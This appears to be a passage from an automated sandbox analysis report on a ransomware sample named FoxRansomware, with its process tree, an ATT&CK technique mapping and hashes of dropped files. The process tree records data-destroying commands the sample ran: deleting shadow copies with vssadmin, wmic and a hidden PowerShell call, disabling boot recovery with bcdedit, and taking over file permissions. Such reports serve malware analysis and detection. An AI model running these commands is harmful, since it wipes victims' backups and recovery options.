attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
3⤵
- Views/modifies file attributes
PID:1152

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
3⤵
PID:1264

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
3⤵
- Modifies file permissions
PID:3904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c nt7HdeS1.exe -accepteula "AdobeID.pdf" -nobanner
3⤵
- Loads dropped DLL
PID:3700

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nt7HdeS1.exe
nt7HdeS1.exe -accepteula "AdobeID.pdf" -nobanner
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3388

C:\Users\Admin\AppData\Local\Temp\nt7HdeS164.exe
nt7HdeS1.exe -accepteula "AdobeID.pdf" -nobanner
5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4796

C:\Windows\system32\taskeng.exe
taskeng.exe {D122CE25-E8EE-4924-B75E-E5B3667417C0} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]
1⤵
PID:4936

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\1XP4PlhR.bat"
2⤵
PID:3304

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /All /Quiet
3⤵
- Interacts with shadow copies
PID:2304

C:\Windows\System32\Wbem\WMIC.exe
wmic SHADOWCOPY DELETE
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\system32\vssadmin.exe
"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
4⤵
- Interacts with shadow copies
PID:2960

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
3⤵
- Modifies boot configuration data using bcdedit
PID:2192

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
3⤵
- Modifies boot configuration data using bcdedit
PID:4828

C:\Windows\system32\schtasks.exe
SCHTASKS /Delete /TN DSHCA /F
3⤵
PID:2780

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4848

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Defacement

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\#FOX_README#.rtf
Filesize
8KB

MD5
7f3866550bab36f4ec092027a89abab2

SHA1
5332c64e5cef61f2c998c6d9b47de8131d96c130

SHA256
6832c5589b9ce335aac7af3d6e917ff580e4b0d038b0936e0d6258c2db9abe86

SHA512
a453f7f0f5f28dedd665a1f934a6167be344b886580f00adbac99a7ba502684696f090a502b671ec74cb45ad26d53828e30448b84070411b2ae406ef0c0057ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Kc1sJfyH.txt
Filesize
16B

MD5
17d432845dc7cb55ac69d75cf72f7f5d

SHA1
7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3

SHA256
a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4

SHA512
25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWtN47iM.exe
Filesize
1.2MB

MD5
76b640aa00354e46b29ca7ac2adfd732

SHA1
afebf9d72ba7186afefebf4deda87675621b0b8b

SHA256
0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7

SHA512
fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_0220D303420C1C0E.txt
Filesize
20KB

MD5
0ea1b0923b0e70fe6201f593b4529138

SHA1
882cc7f744d1d8de3d4d149e99b1f867c9222e50

SHA256
845f768081e7201e3361ca23327cdbfc0ca242f4f77156515bccafe2dfb1f2ab

SHA512
5f2fc36e13bfc258b1d32a913ab867c81f41272cf8e1d153e773aca3692597fb21e63b06a9c05fc5fddfe416009d7832dda388f18f1dff12c6d136f1f8699e32

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\erg3H7Vx.bat
Filesize
246B

MD5
65f53a4f315ba04100247f1a74e83563

SHA1
3ea9d19bed7f4c19357a005897453af24ffc33b8

SHA256
c0b66a9cc3706fcfb2c6652b720e6b2490dcfd7a7940807a185aa11dd887169f

SHA512
a303f1e4d6234c6827f69f2c38aee74c663727937a3cb3ba4e5a5c176a002dc8400cd628dce0fe68838f483d9a33a000b1d0a23943da98a42c614b4d1b4f2ddd

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nt7HdeS1.exe
Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\nt7HdeS164.exe
Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Roaming\1XP4PlhR.bat
Filesize
415B

MD5
7d55f71b67cf7c7ab6839b0ac5f2509a

SHA1
5000ca2f9b224f26264334711c25fb14fc6de1b5

SHA256
f3276096d90b379ff283449a090195b06df22b5ead38960b2adb50d5fa7c24c4

SHA512
f92a9dcf6e6bffac9208e65c4e1551cd825b9fe572efbeb9d1a505f527d2f34de21bcea93c0ce5ca787dab80568c125fc79e6872bd3bb3e6fe299b936c1cee0d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VR2V2MV0Z3RFVGOKJ36U.temp
Filesize
7KB

MD5
d4436f323fa871e6d65c12cc5245642e

SHA1
746ce9e95afb258bf0336833b0008c5045e5a34a

SHA256
af5a1e5d8d6d0ba0fdcef5571c139c0042f0f46ddabf09dabeef66426c054e41

SHA512
16a4df511bb1dca4e5813e573a57734c53e2898cb43299dfdc4fc307797f0c621c7aecfbcca9518a09f3409c83c630d80c70ef6d43d23afbd33ea7379272a087

Download Submit
C:\Users\Admin\AppData\Roaming\TQjosvO6.vbs
Filesize
260B

MD5
c9fcd262b9ce092c6655a58c0ccbc260

SHA1
faedc154ee26e8327cc8298ead452d2858640674

SHA256
b1d4f36f8128d47983f34f9b79a6ca0e34efa29c2dc2503f21556f70608bba36

SHA512
2e44b5bdf4ad3e29ca5ee7fde92afd4a4584689eb87c55975a7709f0f629ef551c53897a46ea6aeee9acd32fdae77511a583365b472a3545a7adbbf61d85465e

Download Submit
memory/2020-14700-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

Filesize
2.9MB

Download
memory/2020-14701-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2020-14704-0x000007FEF48C0000-0x000007FEF525D000-memory.dmp

Filesize
9.6MB

Download
memory/2020-14705-0x0000000002D3B000-0x0000000002DA2000-memory.dmp

Filesize
412KB

Download
memory/2020-14702-0x0000000002D34000-0x0000000002D37000-memory.dmp

Filesize
12KB

Download
memory/2464-8-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/2712-16-0x0000000001BA0000-0x0000000001BE0000-memory.dmp

Filesize
256KB

Download
memory/2712-17-0x0000000073D30000-0x00000000742DB000-memory.dmp

Filesize
5.7MB

Download
memory/2712-15-0x0000000001BA0000-0x0000000001BE0000-memory.dmp

Filesize
256KB

Download
memory/2712-14-0x0000000001BA0000-0x0000000001BE0000-memory.dmp

Filesize
256KB

Download
memory/2712-13-0x0000000073D30000-0x00000000742DB000-memory.dmp

Filesize
5.7MB

Download
memory/2712-12-0x0000000073D30000-0x00000000742DB000-memory.dmp

Filesize
5.7MB

Download
memory/2712-11-0x0000000073D30000-0x00000000742DB000-memory.dmp

Filesize
5.7MB

Download
memory/2856-3887-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/2856-12480-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/2856-14713-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/3388-4826-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3700-4789-0x00000000004D0000-0x0000000000547000-memory.dmp

Filesize
476KB

Download
memory/3700-14717-0x00000000004D0000-0x0000000000547000-memory.dmp

Filesize
476KB

Download